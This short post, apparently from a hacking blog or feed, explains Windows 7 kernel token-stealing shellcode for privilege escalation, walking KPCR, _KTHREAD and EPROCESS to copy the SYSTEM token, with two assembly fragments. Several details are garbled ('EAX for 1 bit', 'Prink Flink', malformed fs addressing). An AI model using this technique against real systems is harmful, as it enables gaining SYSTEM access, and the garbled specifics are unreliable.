#Kernel_Land #Privilege #Shellcode (Win7)

#Iran

One way to create a system with a system-level access to Windows OS 7 is by exploring KPRC or Kernel Processor Control and scrolling to ProcbData, which is at ntdll! _KPCR + 0x120, and to ProcbData + 0x004. Get the CurrentThread value,

mov eax, [fs: eax + 0x124]

In the next step of _KTHREAD structure we obtain and explore the ApcState value at position + 0x040, while exploring _KAPC_STATE at position + 0x010 we can store the process kernel value in EAX for 1 bit and RAX for 1 bit ,

mov eax, [eax + 0x50]

Next, we have to process UniqueProcessId for the process we want to upgrade using the PsGetCurrentProcess function. Finally, we need to get the EPROCESS construct where the tokens are considered and use the Prink Flink pointer. Apply before and after to find a system token and replace it with our CurrentThread token …

Categories: